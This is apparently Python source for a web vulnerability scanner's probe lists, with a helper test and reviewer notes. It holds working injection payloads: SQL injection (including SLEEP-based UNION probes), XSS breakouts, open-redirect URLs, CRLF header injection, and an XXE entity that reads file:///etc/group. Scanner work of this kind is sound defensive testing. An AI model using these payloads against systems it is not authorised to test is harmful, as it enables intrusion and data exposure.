def __init__(self):
    """Assemble the fixed list of short probe strings.

    The list holds the quote and parenthesis characters, the ``NULL``
    keyword, one random lowercase word (5 chars), one random digit string
    (4 chars) and a ``--`` marker, in that order.
    """
    # NOTE(review): these look like SQL syntax breakers for an error-based
    # check; the code that sends them and inspects the response is not
    # visible here. If detection relies on database error text appearing in
    # the response, a clean response is not evidence that the parameter is
    # safe (errors may simply be suppressed) - confirm with the caller.
    probes = ["'", '"', '(', ')', "NULL"]
    probes.append(utility.generate_random(string.ascii_lowercase, size=5))
    probes.append(utility.generate_random(string.digits, size=4))
    probes.append("--")
    self._payloads = probes
def __init__(self):
    """Build ``(payload, delay)`` pairs for the SLEEP-based probes.

    Every template is paired with the value 9.00, which matches the
    ``SLEEP(9)`` embedded in the template text. The four operator
    templates additionally carry a random 4-letter marker on both sides of
    a string comparison; the marker is kept in ``self._random``.
    """
    # Must stay in sync with the literal SLEEP(9) inside every template.
    # NOTE(review): presumably the number of seconds the caller expects the
    # response to be delayed by - the timing comparison is not visible here.
    # A fixed threshold should be judged against a measured baseline, or
    # slow endpoints will be reported as findings.
    sleep_seconds = 9.00

    # NOTE(review): SLEEP() is MySQL/MariaDB syntax, so a negative result
    # from this set says nothing about other database back ends.
    templates = [
        # single-quoted context, one to five columns
        "' UNION SELECT SLEEP(9) -- ",
        "' UNION SELECT null,SLEEP(9) -- ",
        "' UNION SELECT null,null,SLEEP(9) -- ",
        "' UNION SELECT null,null,null,SLEEP(9) -- ",
        "' UNION SELECT null,null,null,null,SLEEP(9) -- ",
        # double-quoted context, one to five columns
        '" UNION SELECT SLEEP(9) -- ',
        '" UNION SELECT null,SLEEP(9) -- ',
        '" UNION SELECT null,null,SLEEP(9) -- ',
        '" UNION SELECT null,null,null,SLEEP(9) -- ',
        '" UNION SELECT null,null,null,null,SLEEP(9) -- ',
        # integer context, one to five columns
        "1 UNION SELECT SLEEP(9) -- ",
        "1 UNION SELECT null,SLEEP(9) -- ",
        "1 UNION SELECT null,null,SLEEP(9) -- ",
        "1 UNION SELECT null,null,null,SLEEP(9) -- ",
        "1 UNION SELECT null,null,null,null,SLEEP(9) -- ",
        # boolean operator forms; the only templates with {} placeholders
        "' AND SLEEP(9) AND '{}'='{}",
        "' OR SLEEP(9) AND '{}'='{}",
        "') AND SLEEP(9) AND ('{}'='{}",
        "') OR SLEEP(9) AND ('{}'='{}",
    ]

    self._random = utility.generate_random(string.ascii_lowercase, size=4)
    marker = self._random

    # Templates without placeholders pass through format() unchanged.
    timed = []
    for template in templates:
        timed.append((template.format(marker, marker), sleep_seconds))
    self._payloads = timed
def __init__(self):
    """Build ``(true_payload, false_payload)`` pairs for boolean probes.

    Each pair holds a condition that compares a value with itself and a
    counterpart that compares it with a different value (``!`` prefix, or
    ``1221=2112`` for the integer form). A random 4-letter marker, kept in
    ``self._random``, fills the ``{}`` placeholders.
    """
    # NOTE(review): presumably the caller compares the responses to the two
    # halves of a pair; that logic is not visible here. Pages with dynamic
    # content (timestamps, tokens, ads) differ between any two requests, so
    # a plain inequality test would over-report - confirm how the
    # comparison is normalised.
    pairs = [
        # AND
        ("' AND '{}'='{}", "' AND '{}'='!{}"),
        ("' AND '{}'='{}' -- ", "' AND '{}'='!{}' -- "),
        ("' AND '{}'='{}' #", "' AND '{}'='!{}' #"),
        # OR (the false half is still an AND condition)
        ("' OR '{}'='{}", "' AND '{}'='!{}"),
        ("' OR '{}'='{}' -- ", "' AND '{}'='!{}' -- "),
        ("' OR '{}'='{}' #", "' AND '{}'='!{}' #"),
        # LIKE context; no placeholders in these two rows
        ("%' AND '%'='", "%' AND '%'='!"),
        ("%' OR '%'='", "%' AND '%'='!"),
        # double quotes
        ('" OR "{}"="{}', '" AND "{}"="!{}'),
        ('" OR "{}"="{}" -- ', '" AND "{}"="!{}" -- '),
        ('" OR "{}"="{}" #', '" AND "{}"="!{}" #'),
        # integer; no placeholders
        ("1 OR 1221=1221", "1 AND 1221=2112"),
        # parentheses
        ("') AND ('{}'='{}", "') AND ('{}'='!{}"),
        ("') OR ('{}'='{}", "') AND ('{}'='!{}"),
    ]

    self._random = utility.generate_random(string.ascii_lowercase, size=4)
    marker = self._random

    rendered = []
    for truthy, falsy in pairs:
        rendered.append(
            (truthy.format(marker, marker), falsy.format(marker, marker))
        )
    self._payloads = rendered
def __init__(self):
    """Build the single ``javascript:`` URI probe.

    The ``{}`` placeholder is filled with a random 4-letter lowercase
    marker, which is also stored in ``self._random``.
    """
    templates = ("javascript:{}()",)

    self._random = utility.generate_random(string.ascii_lowercase, size=4)
    marker = self._random

    # NOTE(review): a 4-letter lowercase marker can occur naturally in page
    # text; if the caller only searches the response for the marker, anchor
    # the match to the whole payload or an attribute context - the matching
    # code is not visible here.
    rendered = []
    for template in templates:
        rendered.append(template.format(marker))
    self._payloads = rendered
def __init__(self):
    """Build the HTML tag-injection probes.

    Every template introduces an element whose tag name is a random
    lowercase marker (default length of ``utility.generate_random``), kept
    in ``self._random``. The probes carry a made-up tag and an empty
    ``event=()`` attribute rather than executable script.
    """
    templates = [
        # paired open/close tag, in several quoting contexts
        '<{}></{}>',
        '"><{}></{}><"',
        "'><{}></{}><'",
        ' ><{}></{}>< ',
        # single tag with an attribute
        '<{} event=()>',
        '"><{} event=()><"',
        "'><{} event=()><'",
        ' ><{} event=()>< ',
        # breaking out of an existing <script> element
        '</script><{}></{}><script>',
        '</script><{} event=()><script>',
        # backslash before the quote
        '\\"><{}></{}><\\"',
        '\\"><{} event=()><\\"',
    ]

    self._random = utility.generate_random(string.ascii_lowercase)
    marker = self._random

    # NOTE(review): presumably the caller looks for the tag coming back
    # unencoded; that check is not visible here. Reflection inside a
    # comment, a <textarea> or a JSON response is not the same as markup
    # being parsed, so the match should take the response context and
    # Content-Type into account.
    # Single-placeholder templates ignore the second format() argument.
    rendered = []
    for template in templates:
        rendered.append(template.format(marker, marker))
    self._payloads = rendered
def __init__(self):
    """Build the external-URL probes.

    Each template is a differently written reference to
    ``www.<marker>.com``, where the marker is a random lowercase string
    stored in ``self._random``.
    """
    templates = (
        'http://www.{}.com',
        'https://www.{}.com',
        '//www.{}.com',      # scheme-relative
        '/\t/www.{}.com',    # slash, TAB, slash
        '/\\www.{}.com',     # slash, backslash
        'https:www.{}.com',  # scheme without slashes
    )

    self._random = utility.generate_random(string.ascii_lowercase)
    marker = self._random

    # NOTE(review): www.<random>.com is not a reserved name and may resolve
    # to a real third party. If the scanner (or a browser replaying a
    # finding) follows the redirect, the request leaves the test scope; a
    # reserved domain such as one under .example or .invalid (RFC 2606)
    # would avoid that. Whether redirects are followed is not visible here.
    rendered = []
    for template in templates:
        rendered.append(template.format(marker))
    self._payloads = rendered
def test_generate_random():
    """Check alphabet, default length, ``size=`` and empty-alphabet handling.

    ``utility.generate_random`` is expected to draw only from the given
    alphabet, return 7 characters by default, honour an explicit ``size``
    and return an empty string for an empty alphabet.
    """
    # letters only, default length
    letters = utility.generate_random(string.ascii_letters)
    assert letters.isalpha()
    assert len(letters) == 7

    # digits only, default length
    digits = utility.generate_random(string.digits)
    assert digits.isdigit()
    assert len(digits) == 7

    # explicit size
    long_letters = utility.generate_random(string.ascii_letters, size=20)
    assert long_letters.isalpha()
    assert len(long_letters) == 20

    # empty alphabet yields an empty string instead of raising
    nothing = utility.generate_random('')
    assert nothing == ''
def __init__(self):
    """Build the header-injection probes.

    Each template is a line-break sequence followed by a ``Set-Cookie``
    header whose cookie name and value are both the random lowercase
    marker stored in ``self._random``.
    """
    templates = (
        '\r\nSet-Cookie: {}={}',  # CR LF
        '\nSet-Cookie: {}={}',    # LF only
        '\rSet-Cookie: {}={}',    # CR only
        # U+010D U+010A: deliberately non-ASCII characters whose low bytes
        # are 0x0D / 0x0A. This is not an encoding error; keep it exact.
        'čĊSet-Cookie: {}={}',
    )

    self._random = utility.generate_random(string.ascii_lowercase)
    marker = self._random

    # NOTE(review): presumably the caller checks whether a cookie named
    # after the marker appears in the response headers; that check is not
    # visible here. It should inspect parsed headers, because the same text
    # echoed in the response body is not a header split.
    rendered = []
    for template in templates:
        rendered.append(template.format(marker, marker))
    self._payloads = rendered
def __init__(self):
    """Build the XML external-entity probe document.

    The document declares one external entity pointing at
    ``file:///etc/group`` and references it from the root element. The
    entity name is a random 4-letter marker (``self._random``) and the
    root element name is that marker reversed.
    """
    templates = (
        '<?xml version="1.0"?><!DOCTYPE {} [<!ENTITY {} SYSTEM "file:///etc/group">]><{}>&{};</{}>',
    )

    self._random = utility.generate_random(string.ascii_lowercase, size=4)
    entity = self._random
    root = entity[::-1]

    # NOTE(review): /etc/group exists only on Unix-like hosts, and the
    # probe shows a result only if the entity content is echoed back, so
    # other platforms and parsers that resolve entities without reflecting
    # them would be missed. How the response is evaluated is not visible
    # here.
    rendered = []
    for template in templates:
        rendered.append(template.format(root, entity, root, entity, root))
    self._payloads = rendered
def __init__(self):
    """Build the external script-source probes.

    Every template references ``<c>.js`` on ``www.<marker>.com``, where
    the marker is a random lowercase string stored in ``self._random`` and
    ``<c>`` is its first character. Templates cover a value placed inside
    an existing ``src`` attribute and a ``src`` attribute added after
    breaking out of a quoted or unquoted attribute.
    """
    templates = (
        # value lands inside an existing src attribute
        '//www.{}.com/{}.js',
        '\\www.{}.com\\{}.js',
        # value adds a src attribute of its own
        '" src=//www.{}.com/{}.js><"',
        '" src=\\www.{}.com\\{}.js><"',
        "' src=//www.{}.com/{}.js><'",
        "' src=\\www.{}.com\\{}.js><'",
        " src=//www.{}.com/{}.js>< ",
        " src=\\www.{}.com\\{}.js>< ",
    )

    self._random = utility.generate_random(string.ascii_lowercase)
    marker = self._random
    script_name = marker[0]

    # NOTE(review): www.<random>.com is not a reserved name. If a finding
    # is replayed in a browser, the page would try to load script from
    # whoever owns that domain; a reserved domain such as one under
    # .example or .invalid (RFC 2606) would avoid that.
    rendered = []
    for template in templates:
        rendered.append(template.format(marker, script_name))
    self._payloads = rendered
def __init__(self):
    """Build the script-context probes.

    Each template places a call to a function named after a random
    5-letter lowercase marker (``self._random``) into a JavaScript string
    or statement context, with parentheses or with backticks.
    """
    templates = (
        # single-quoted string context
        "'+{}()+'",
        "';{}();//'",
        # double-quoted string context
        '"+{}()+"',
        '";{}();//"',
        # unquoted
        '{}()',
        # backticks instead of parentheses
        "'+{}``+'",
        '"+{}``+"',
        "';{}``;//'",
        '";{}``;//"',
    )

    self._random = utility.generate_random(string.ascii_lowercase, size=5)
    marker = self._random

    # NOTE(review): presumably the caller looks for the payload reflected
    # unescaped inside a script block; that check is not visible here.
    # Reflection outside a script context, or with the quotes escaped, does
    # not show that script syntax can be broken out of.
    # Every template has one placeholder; the second argument is unused.
    rendered = []
    for template in templates:
        rendered.append(template.format(marker, marker))
    self._payloads = rendered